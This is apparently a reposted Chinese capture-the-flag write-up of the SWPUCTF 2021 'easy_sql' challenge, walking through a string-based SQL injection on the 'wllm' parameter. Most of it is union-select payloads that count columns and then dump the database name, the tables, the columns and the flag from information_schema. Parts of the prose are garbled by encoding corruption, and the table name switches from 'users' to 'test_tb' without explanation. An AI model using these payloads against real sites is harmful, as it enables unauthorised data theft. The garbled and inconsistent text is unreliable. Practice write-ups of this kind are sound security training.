拿到題目,查看源碼,可知是要輸入?yún)?shù)wllm。
輸入?yún)?shù)/?wllm=1,得到會顯
繼續(xù)輸入?yún)?shù)/?wllm=1',報錯,確定為字符型漏洞
1.查看字段列表,發(fā)現(xiàn)在字段4報錯,確定為3列
?wllm=-1' order by 3--+
?wllm=-1' order by 4--+
2.查看回顯
?wllm=-1' union select 1,2,3--+
3.查詢數(shù)據(jù)庫名(test_db)
?wllm=-1' union select 1,2,database()--+
4.查看test_db庫的表(users)
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
5.查詢字段
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
6.出現(xiàn)flag字段,查看flag字段的內(nèi)容
/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+
文章來源:http://www.zghlxwxcb.cn/news/detail-698756.html
出現(xiàn)flag字段,成功解出文章來源地址http://www.zghlxwxcb.cn/news/detail-698756.html
到了這里,關(guān)于字符型注入([SWPUCTF 2021 新生賽]easy_sql)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!